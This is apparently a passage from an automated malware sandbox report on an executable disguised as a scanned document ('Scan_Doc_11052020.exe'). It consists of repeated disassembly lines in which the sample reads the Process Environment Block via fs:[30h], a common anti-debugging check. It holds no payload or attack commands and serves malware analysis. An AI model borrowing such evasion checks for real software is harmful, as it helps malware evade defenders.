Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EC356C mov eax, dword ptr fs:[00000030h]0_2_05EC356C
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EC356C mov eax, dword ptr fs:[00000030h]0_2_05EC356C
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF056B mov eax, dword ptr fs:[00000030h]0_2_05EF056B
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EFE52F mov ecx, dword ptr fs:[00000030h]0_2_05EFE52F
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EFE52F mov eax, dword ptr fs:[00000030h]0_2_05EFE52F
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EFE52F mov eax, dword ptr fs:[00000030h]0_2_05EFE52F
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F9952E mov eax, dword ptr fs:[00000030h]0_2_05F9952E
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE1530 mov eax, dword ptr fs:[00000030h]0_2_05EE1530
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE1530 mov eax, dword ptr fs:[00000030h]0_2_05EE1530
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE1530 mov eax, dword ptr fs:[00000030h]0_2_05EE1530
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE1530 mov eax, dword ptr fs:[00000030h]0_2_05EE1530
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE1530 mov eax, dword ptr fs:[00000030h]0_2_05EE1530
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE1530 mo